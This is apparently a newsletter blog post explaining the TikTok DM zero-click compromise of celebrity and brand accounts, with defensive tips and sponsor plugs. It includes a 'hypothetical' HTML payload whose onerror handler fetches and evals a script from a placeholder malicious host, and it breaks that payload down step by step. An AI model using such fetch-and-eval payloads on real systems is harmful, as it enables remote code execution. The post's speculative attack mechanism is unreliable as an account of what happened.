How TikTok Accounts were Compromised

Instantly calculate the time you can save by automating compliance

Whether you’re starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.

Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.

Instantly calculate how much time you can save with Vanta.

[Calculate now]

How TikTok Accounts were Compromised

Understanding the Zero-Click Attack

As you probably already know, this week, several high-profile TikTok accounts, including that of Paris Hilton, have been compromised through a sophisticated cyberattack known as a zero-click attack. In this article we break down how the attack works and also include an example of what a malicious TikTok DM might look like and also how to protect against zero-click attacks. This type of attack does not require any user interaction, making it particularly insidious and difficult to detect. The breach has raised alarms in the cybersecurity community, prompting a deeper look into how these attacks occur and how users can protect themselves.

The Incident: What Happened?

The compromised accounts included several celebrities and influencers, such as:

• Paris Hilton

• Sony

• CNN

These accounts were targeted using a method that exploited vulnerabilities within TikTok's direct messaging system. The attackers sent specially crafted messages that automatically triggered malicious code execution upon delivery, without requiring the recipients to open or interact with the messages.

Get smarter about crypto with MilkRoad’s 5 minute daily newsletter, read by 290,000+ people. Subscribe for free!

How Zero-Click Attacks Work

Zero-click attacks exploit vulnerabilities in the software that processes incoming data, such as messages or media files, to gain unauthorized access to a device. These attacks can bypass traditional security measures that rely on user interaction, such as clicking on a malicious link or downloading an infected file.

According to Kaspersky, zero-click attacks work by exploiting flaws in the device's data verification processes. These vulnerabilities, often termed zero-day vulnerabilities, are unknown to the software developers and thus remain unpatched, providing an entry point for cybercriminals.

Technical Details

1. Vulnerability Identification: Cybercriminals identify a flaw in a messaging or calling app, such as TikTok's DM system.

2. Crafting the Payload: They create a message or media file that includes malicious code designed to exploit this flaw.

3. Delivery: The crafted message is sent to the target. Upon receipt, the device's software processes the message, triggering the execution of the malicious code.

4. Execution and Control: The code executes, often silently, granting the attacker access to the device’s data and functionality without any indication to the user.

If you want to start your own newsletter and want to start earning straight away, please feel free to use my affiliate link here.

Example of a Malicious Message

Here’s a hypothetical example of a malicious message that might have been used in the recent TikTok zero-click attack. This example demonstrates how an attacker could craft a seemingly harmless message that contains embedded malicious code.

Sample TikTok DM:

Sender: TrustedContact

Message Content:

Hi [Recipient's Name],

Check out this amazing new filter I found! 😍 It's so cool!

![Image Placeholder]

Let me know what you think!

Embedded Malicious Code:

Within the message, the image placeholder might contain hidden malicious code that exploits a vulnerability in the way TikTok handles image or multimedia files. The code could be designed to execute automatically when the message is received and processed by the app, without the user having to open or interact with the image.

Here’s an outline of what the embedded code might look like in a simplified form:

<img src="https://trustedsite.com/image.jpg" onerror="fetch('https://malicious-site.com/exploit.js').then(response => response.text()).then(code => eval(code))">

Breakdown of the Code

1. <img src="https://trustedsite.com/image.jpg">: This part of the message appears to load a normal image from a trusted source.

2. onerror="fetch('https://malicious-site.com/exploit.js').then(response => response.text()).then(code => eval(code))": This is the malicious payload. It leverages the onerror event of the image tag to execute the following steps if the image fails to load:

   • fetch('https://malicious-site.com/exploit.js'): Fetches a malicious script from an external server.

   • .then(response => response.text()): Reads the response as text.

   • .then(code => eval(code)): Executes the fetched code using the eval function.

Impact and Response

TikTok confirmed that a "very limited" number of accounts were compromised and stated that they have taken immediate steps to mitigate the vulnerability and prevent further attacks. The company has also been working directly with the affected users to restore their accounts and ensure their security. However, the exact number of accounts affected and the specifics of the mitigation techniques employed have not been disclosed.

The breach also included accounts of major corporate and media entities such as Sony and CNN, further highlighting the broad target range of the attackers and the potential for extensive damage.

Broader Implications

This incident underscores the evolving challenges in securing popular social media platforms. It follows previous reports of vulnerabilities in TikTok and other platforms, highlighting the need for continuous security improvements and vigilance against sophisticated cyber threats.

For instance, in 2021, a vulnerability in TikTok's platform could have allowed attackers to build a database of users and their associated phone numbers. Another significant issue was reported in September 2022, where a one-click exploit in TikTok's Android app was discovered. These incidents underscore the necessity for continuous security improvements and the need for users to remain vigilant about their online security practices.

Protecting Against Zero-Click Attacks

Given the stealthy nature of zero-click attacks, traditional defenses like antivirus software and user education on phishing are not sufficient. Here are some strategies to enhance security:

1. Regular Software Updates: Ensure all devices and apps are updated to the latest versions, as these updates often include patches for known vulnerabilities.

2. Use Comprehensive Security Solutions: Employ security software that can detect unusual behaviors and unknown threats, not just known malware.

3. Disable Auto-Loading Features: Disable features that automatically load or preview messages and media files, reducing the chances of malicious code execution.

4. Advanced Threat Protection: Utilize advanced threat protection tools that can detect and mitigate zero-click attacks through behavioral analysis and anomaly detection.

Conclusion

The recent zero-click attack on TikTok underscores the evolving nature of cybersecurity threats and the importance of robust security measures. As platforms like TikTok continue to grow in popularity, they become increasingly attractive targets for cybercriminals. Users must stay informed about potential threats and ensure they follow best practices for securing their accounts, while companies must invest in advanced security technologies and continuously update their defenses to protect against new and emerging threats.

This incident serves as a reminder of the vulnerabilities inherent in even the most widely used and technologically advanced platforms, urging a collective effort towards improved cybersecurity resilience.

By understanding the mechanics of zero-click attacks and implementing proactive security measures, we can better safeguard our digital lives from these invisible yet potent threats.